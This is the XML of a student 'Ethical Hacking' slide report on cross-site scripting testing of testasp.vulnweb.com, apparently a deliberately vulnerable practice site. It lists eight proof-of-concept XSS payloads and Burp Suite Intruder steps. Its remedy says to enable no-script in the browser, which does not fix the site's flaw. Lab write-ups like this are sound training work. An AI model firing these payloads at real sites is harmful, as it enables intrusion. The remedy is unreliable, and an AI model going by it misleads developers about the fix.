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59" r:id="rId6"/>
    <p:sldId id="258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116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17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10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8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5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19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32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104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13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6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364F27-D5F3-47F9-A511-C989AADF5B32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C4CEE-B9A8-4EC6-B1C9-267E454445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70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657626" y="2321307"/>
            <a:ext cx="464961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u="sng" smtClean="0"/>
              <a:t>Ethical Hacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3718828" y="3227082"/>
            <a:ext cx="3988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Scanning : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/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126100" y="5944402"/>
            <a:ext cx="2566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Name : Krishna Vijay Patil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8574" y="439947"/>
            <a:ext cx="1742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Task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357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ask3 PO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2860"/>
            <a:ext cx="12192000" cy="61851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2077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Adding Payloads For Attacks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40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4234"/>
            <a:ext cx="12192000" cy="61937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146649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Attack In Progress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4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72860"/>
            <a:ext cx="12192001" cy="61851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2" y="181155"/>
            <a:ext cx="1219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Finding Successful Payloads For XSS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08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728"/>
            <a:ext cx="12192000" cy="62282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2939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Attack Succeed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67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062372"/>
            <a:ext cx="121920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u="sng" dirty="0" smtClean="0"/>
              <a:t>Title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> : Cross Site Scripting(Payloads) In http://testasp.vulnweb.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> : Vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Subdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> : http://testasp.vulnweb.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Testing Environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>BurpSuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Wifi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u="sng" dirty="0" smtClean="0"/>
              <a:t>Payloads Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>1) &lt;image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=prompt(8)&gt; success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2) "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=alert(1)//</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>3) &lt;image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> =q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=prompt(8)&gt; success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4) &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> =q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=prompt(8)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>5) &lt;/scrip&lt;/script&gt;t&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> =q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=prompt(8)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>6) &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=alert(1)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>7) "&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=alert(1)//</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>8) '-alert(1)-'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-1" y="138023"/>
            <a:ext cx="12192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 smtClean="0"/>
              <a:t>Report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72323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880740"/>
            <a:ext cx="121920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u="sng" dirty="0" smtClean="0"/>
              <a:t>Step By Step Process : (As per POC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Step 1: Visit http://testasp.vulnweb.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Step 2: On the top menu you will find a search option.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Step 3: Click on it and you will be prompted with the Search box.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Step 4: You can intercept the request in Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Step 5: Now you can find different payloads for XSS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Step 6: Send the request to the intruder and paste all the payloads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Step 7: Try to find a successful payload for XSS.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u="sng" dirty="0" smtClean="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> : An attacker might harm your website by cross site scripting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	 Vulnerability may harm your user's privacy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u="sng" dirty="0" smtClean="0"/>
              <a:t>Remedy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> : If you want to prevent your website to be vulnerable of cross site scripting then you can just enable non-script on browser.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4524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132</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>41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 Patil</dc:creator>
  <cp:lastModifiedBy>Krishna Patil</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-15T11:34:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-15T12:17:42Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>